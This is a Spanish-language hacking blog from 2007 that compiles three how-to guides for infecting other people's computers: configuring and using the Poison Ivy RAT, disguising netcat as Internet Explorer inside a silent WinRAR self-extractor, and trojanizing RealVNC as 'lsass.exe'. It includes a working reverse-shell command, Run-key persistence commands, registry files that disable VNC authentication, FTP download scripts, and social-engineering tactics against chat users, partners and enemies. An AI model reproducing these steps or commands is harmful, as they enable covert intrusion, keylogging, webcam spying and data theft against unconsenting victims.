sábado, 23 de junio de 2007

MANUAL DEL TROYANO POISON IVY 2.3.0

MANUAL DEL POISON IVY 2.3.0 By Raz!el



Bueno antes q nada quiero decir que este manual es 100% creado por mi!
aclarado esto vamos comenzemos! :8):

*antes q nada descargamos el troyano de AQUI

*ahora lo ejecutamos
*click en "new client"



*aparecera la siguient ventana



*listen on port es el puerto a las escucha!
*pasword (ya saben lo q hace jejeje)
*luego q lo configuren a su antojo el puerto y el pasword le dan click en start



*ahora en file hacemos click en "new server"



*click en "create profile" y escribimos cualkier nombre y click en ok



*en la parte dns/port le dan click en add y colocan su ip o su dominio no-ip, el mismo puerto q colocaron antes y el mismo pasword
*le dan en test connections y les saldra como en la imagen! luego click en ok y luego en next



*seleccionan la casilla de activeX Startup y click en random
*en copy file
*en filename colocan un nombre q no sea tan llamtativo como el q yo le puse XD!
*seleccionan en que carpeta deseen que se copiel el server
*seleccionan las opciones q deseen (melt, persistence,keylogger)
*una vez terminado todo click en next!



*process mutex les recomiendo q lo dejen como estan y cambienlo si solo saben lo q hacen!!
*por defecto viene q el server se inyecte en el proceso del msn , pero si desean cambiarlo clickeen en la casilla inject a custom process y coloken el proceso q kieran!
*en format les aconsejo q lo dejen como esta, cambienlo si saben lo q hacen!
*click en next



*si kieren cambiar el icono delen click en icon y buscamos un icono!
*luego click en generate, colocan el nombre q kieran al server y le dan en guardar (el server se creara en la carpeta dond tengan el cliente del poison ivy 2.3.0) luego le dan ok!

editado: ... para los q kieran encriptar sus servers con el themida o otros, aqui les dejo esto!



como ven cuando esten configurando el server y lleguen a esta parte! NO seleccionen la casilla donde dice "Executed third-party aplication after build" y le dan en "generate"
y listo ya luego q tengan sus servers joineados con lo q kieran (video,mp3,programas,jpg) pueden pasarle el themida! eso creo q no tengo q explicarlo XD

editado: ya teniendo la (s) victima (s) veremos esto!



*al hacer doble click sobre la victima aparecen la siguiente ventana



information: aqui aparece la informacion del pc victima

*files: aqui tenemos acceso a los archivos de la pc victima! aqui la imagen...haciendo click derecho apareceran las siguientes opciones!
refresh folder: para refrescar la carpeta, esto por si renombramos,ejecutamos o borramos algo, al hacer click en refresh veremos los cambios.
search: esto sirve para buscar archivos especificos en la pc victima!
show thumbnails: esto nos mostrara los iconos de los archivos! en mi caso estaba en la carpeta de imagenes y pueden ver las imagenes en miniatura! ideal si kieren descargarse una imagen especificamente! XD
download: para descargar cualkier archivo d la pc victima a tu pc
upload: para cargar cualkier archivo de tu pc a la pc victima!
execute: este nos trae dos opciones "excute=>normal" es decir visible a la victima y "excute=>hidden" invisible a la victima es decir de manera oculta!
rename: para renombrar cualkier archivo o carpeta en la pc victima!
delete: para borrar archivos en la pc victima



regedit: aqui tenemos acceso al registro de nuestra victima!



processes: muestra los procesos activos en la pc infectada!
haciendo click derecho en esta ventana veremos las siguientes opciones:
refresh: para refrescar la carpeta!
show modules: esta opcion sirve para mostrar los modulos q componen el proceso en el cual estan
kill process: para matar el proceso seleccionado
suspend process: para suspender el proceso seleccionado
si estamos seleccionando un modulo (como se ve en la imagen) aparece la opcion "unload module" esto nos permite hacer q algun modulo q compone el proceso no cargue! (en este caso yo estoy seleccionado el modulo "kernel32" del proceso del nod32)



services: aqui vemos los servicios de la pc victima...haciendo click derecho sobre alguno de ellos apareceran las siguientes opciones:
refresh: refresca la ventana
save to file: crea un archivo .txt con la descripcion del servicio!
start: si el servicio esta detenido lo arranca!
stop: sirve para detener un servicio activo
edit: para editar el servicio
install: instalar un servicio
uninstall desinstalar un servicio



windows: aqui se veran las ventanas que estan abiertas en la pc infectada...al hacer click sobr alguna de estas ventanas apareceran estas opciones:
capture windows para hacer una captura de dicha ventana
show muestra la ventana en la pc victima en caso d q este oculta
hide oculta la ventana la ventana en la pc victima
maximize maximiza la ventana la ventana en la pc victima
minimize minimiza la ventana la ventana en la pc victima
close cierra la ventana en la pc victima



active ports para ver los puertos activos en la pc victima



remote shell* para ver la consola MS-DOS de la victima... la activamos haciendo click en activate y tambien podemos limpiar la ventana y guardar los registros



key logger para registrar las teclas presionadas en la pc victima!... para verlo le damos click derecho luego refresh y listo ...tambien tenemos la opcion de guardarlo en un archivo de texto plano y limpiar la ventana!

recuerden activar la opcion en la creacion del server!

screen capture sirve para capturar la pantalla de la victima y desde alli poder manejarla!



Cita de: mandiubi
Stretch:
sirve para ajustar la pantalla de la victima a la ventana.
Mouse:
sirve para manejar el mouse de la victima y poder clickear en donde queramos.
Keyboard:
sirve para manejar el teclado de la victima y poder escribir en donde queramos.
Interval:
es el intervalo de tiempo en que se toma una y otra captura.
Start:
comienza a capturar pantallazos seguidamente.
Single:
captura un unico pantallazo.
Save:
sirve para guardar la pantalla en un archivo. Si seleccionamos "Autosave" se guardaran todas las que se capturen.
Options:
sirve para cambiar el tamaño y la calidad de la pantalla.

webcam capture para capturar la camara de nuestra victima

Cita de: mandiubi
Stretch:
igual que en la captura de pantalla, sirve para ajustar la imagen a la ventana.
Interval:
el intervalo de tiempo entre cada captura.
Start:
comienza a capturar imagenes.
Single:
captura una unica imagen.
Driver:
muestra las camaras web instaladas en la PC de la victima. Podemos seleccionar cualquiera y con el boton "Activate" la activamos. Si no se encuentra ninguna camara aparecera "No webcam installed!"
Save:
para guardar la imagen a un archivo. Con "Autosave" se guardaran todas automaticamente.

edit id para cambiar el nombre de la victima!
Share: sirve para compartir la conexion del server! es decir como otro cliente
DNS/Port:aqui agregaremos la ip o la cuenta de no-ip para q se conecte el server
ID: aqui va el nombre de la victima! q se vera en el nuevo "cliente"
Password:clave con el q se conectara el nuevo cliente
Run in Same Process/New Process:aqui el server se podra ejecutar en el mismo proceso q estaba anteriormentew o en uno nuevo!
Privileges: son los privilegios q se le daran al nuevo cliente!



update : para cargar un nuevo server a la pc infectada y reemplazar el anterior!
restart para resetear el server
uninstall para desinstalar el server en la pc infectada!
no suban sus server a paginas de antivirus on-line usen su propio av es lo mas recomendable

bueno esto es todo del manual espero q les sirva! si van a copiar el manual completo o part de el, publicar el nombre del autor

By Raz!el

viernes, 22 de junio de 2007

TROYANIZANDO NETCAT


TROYANIZANDO NETCAT by WHK

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS… es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno… primero hay que saber lo que vamos a hacer… la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer
.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) … una ves que digan.. “esa es mi victimaaaaa!!!” entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla… cuando termines le dices que otro día seguimos conversando… si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:




En primer lugar abres el ResHacker y le das en “File/Open” y buscas el netcat. Después pinchas en acción y luego en “Add a new Resource”, luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5) veras que el netcat tiene el mismo icono de Internet Explorer XD



Paso 2: renombramos nc.exe y desde ahora se llamará “iexplorer.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)



Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.



Donde dice “Nombre del archivo” le escribimos “carnada.exe” (por ahora), el formato debe ser en “RAR” el método de compresión el mejor y por último y mas importante “Crear un archivo SFX”, el resto debe quedas deseleccionado.


2.



En la pestaña “Avanzado” (arriba) debes pinchar el botón llamado “Opciones SFX” y comenzaremos a configurar nuestro Winrar SFX.


3.



Ahora en “Carpeta de extracción” le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: “Que es esto?!!”… %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) “C:\” … %homepath% significa “Documents and settings\tu usuario actual” en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul … y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.



Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.



Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:



Y listo ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se… usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas… si alguien cae en tus maldades te debe aparecer esto:



Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio… mirar sus contraseñas volcando el registro en textos y haciéndoles un “type”… para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :




2. Subiendo RealVnc4 para poder hacer una conexión inversa y mirar el escritorio de la otra persona(tutorial mas abajo):




3. Esto fue un ajuste de cuentas XD:



NOTA: Los archivos borrados en la shell no van a la papelera, son eliminados totalmente

Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas


Salu2 Att. Yan.
Unilola Software.

TROYANIZANDO REAL VNC 4

TROYANIZANDO REAL VNC 4




Materiales:
Servidor FTP (cualquiera)
WinVNC4
ResHacker

Acá aprenderemos a troyanizar el realvnc4 de diferentes maneras, pero lo primero será ocultar el fastidioso icono negro con blanco que se muestra al lado de la hora y que nos delata cuando el realvnc está activo… lo haremos con el ResHacker borrando los recursos de iconos e imágenes y todo aquellos que nos pueda delatar:



Si no quieres complicarte la vida puedes bajarlo desde http://512.iespana.es/vnc ya compilado y todo, y por último lo renombramos a “lsass.exe” aprovechándonos de una vulnerabilidad del administrador de tareas que dice que lsass.exe no puede detenerse XD.

Ahora suponiendo que estamos dentro de una shell… lo vamos a subir por ftp.
Abrimos nuestro servidor FTP y configuramos el nombre de usuario y contraseña:




Debe aparecer un icono así:

Ahora vamos a configurar nuestro troyano de dos formas… una es para ver solamente el escritorio de la victima sin que se de cuenta y otra para tomar el control total sin que pueda hacer nada jajaja que malo :p . Para esto necesitamos hacer una entrada de registro de la siguiente manera:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVnc\WinVNC4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"=dword:00000000
"AcceptKeyEvents"=dword:00000000
"AcceptPointerEvents"=dword:00000000
"AcceptCutText"=dword:00000000
"SendCutText"=dword:00000000
"DisableLocalInputs"=dword:00000000
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000000
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000

Copias todo esto y lo pegas en el block de notas y lo guardas como “vm.tmp” que significa “View Mode” … si quieres manejar el escritorio de la victima entonces pega este otro texto:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVnc\WinVNC4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"="0,"
"AcceptKeyEvents"=dword:00000001
"AcceptPointerEvents"=dword:00000001
"AcceptCutText"=dword:00000001
"SendCutText"=dword:00000001
"DisableLocalInputs"=dword:00000001
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000001
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000
"PortNumber"=dword:0000170c
"IdleTimeout"=dword:00000e10
"HTTPPortNumber"=dword:000016a8
"RemovePattern"=dword:00000000

Y lo guardas como “ct.tmp” que significa “Control Total” .

Ahora subiremos las configuraciones y el vnc desde nuestra shell usando el comando ftp.exe de la siguiente forma:



La idea es que atraves del comando echo hagamos un texto con los comandos que ejecutará ftp.exe de la siguiente manera:

Echo o >> ftp.txt
Echo 192.168.1.69 >> ftp.txt En este caso 192.168.1.69 es nuestra IP como servidor FTP
Echo user >> ftp.txt Este es el usuario del FTP
Echo pass >> ftp.txt Este es el password del FTP
Echo get lsass.exe >> ftp.txt Este es nuestro VNC4
Echo get wm_hooks.dll >> ftp.txt
Echo get logmessages.dll >> ftp.txt
Echo get vm.tmp >> ftp.txt Si solamente miramos usamos “vm” si controlamos usamos “ct”
Echo quit >> ftp.txt

Ahora ejecutamos el comando para que nos suba todo: ftp –s:ftp.txt y ahora que ya tenemos todo importamos el registro que hicimos de la siguiente manera: reg import vm.tmp o reg import ct.tmp en el caso de que queramos controlar o solo mirar.

Ahora que ya tenemos nuestro troyano listo y configurado, vamos a proceder a ejecutarlo de la siguiente manera:

Lsass.exe –register
Lsass.exe –start



Ahora que nuestro troyano está corriendo como servicio, estamos listos para entrar con nuestro cliente:



Donde dice 127.0.0.1 es la IP de la victima que tiene el troyano.
Si te fijas… ya no aparece ningun icono que delate su existencia y Aunque pinches con el boton primario o secundario del Mouse (boton derecho e isquierdo) no aparece nada:



Ahora lo haremos de otra forma… lo daremos como carnada sin estar dentro de una shell usando Winrar.

Materiales:
Winrar
RealVNC4

Ahora seleccionaremos lo siguiente y lo comprimiremos:



Y procedemos a compilar nuestro troyano:

1: Crearemos un archivo “sfx”…



2: Vamos a la pestaña “Avanzado y pinchamos en “Opciones SFX”



3: En carpeta de extracción ponemos “%homedrive%%homepath%\update” y en “ejecutar tras la extracción” ponemos “setup” (después explicaremos porque)



4: En la ficha “Modo” seleccionamos “Ocultar todo” y “Omitir ficheros existentes” para evitar errores futuros y que ademas no muestre nada, ya que queremos que sea lo mas silencioso posible no?.



5: En “Texto e icono” donde dice abajo: “Cargar icono SFX desde fichero” buscamos un icono a elección… en mi caso le puse el de un juego llamado “Max Peine” y presionamos aceptar una sola vez.



6: En “comentario aparecerá un texto que dice en un lado: Setup=setup y reemplazamos eso por lo siguiente:

Setup="%windir%\system32\cmd.exe" /c reg import "%homedrive%%homepath%\update\vm.tmp"
Setup=lasaa.exe -noconsole -register
Setup=lasaa.exe -noconsole -start



Fijarse que es una sola linea por cada setup. Ahora me diran que es esto?... ps explico:

Setup="%windir%\system32\cmd.exe" /c reg import %homedrive%%homepath%\update\vm.tmp" // Importamos la configuracion de nuestro troyano
Setup=lasaa.exe -noconsole –register // Registramos el troyano para que se ejecute en modo SYSTEM
Setup=lasaa.exe -noconsole –start // Iniciamos el troyano

Ahora damos aceptar a todo y debe aparecer algo asi:


En mi caso le puse el icono de Max Peine para decirle a mi querido y buen amigo llamado “Victima” que es el demo de MAX PEINE III (obviamente inexistente) y al abrirlo sucederá lo mismo que el primer ejemplo:



Sin icono alguno y nos conectamos con nuestro cliente:



Obviamente 127.0.0.1 debe ir la IP de la victima.

Ahora puedes saber si tu novia te pone los cuernos o darle el susto de su vida al que siempre te ha jodido controlando su pc XD.
Nota: Puedes añadir entradas de registros extras para hacer que se ejecute cada ves que inicie la pc o hacer lo que se te la gana.

Las aplicaciones y el video está en http://512.iespana.es/vnc

Att. Yan
Unilola Software.

Notas del bloger

  • 1) Se puede crear un bat con las siguientes caracteristicas:

    1- la primera kita el dichoso iconito.

    2- la segunda desabilita la autentificación.

    3- la tercera hace que se inicie el sistema.

    reg add hklm\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t reg_dword /d 1 /f

    reg add hklm\SOFTWARE\ORL\WinVNC3 /v authrequired /t reg_dword /d 0 /f

    reg add hklm\software\microsoft\windows\currentversion\run /v dllhost.exe /t reg_sz /d winvnc.exe /f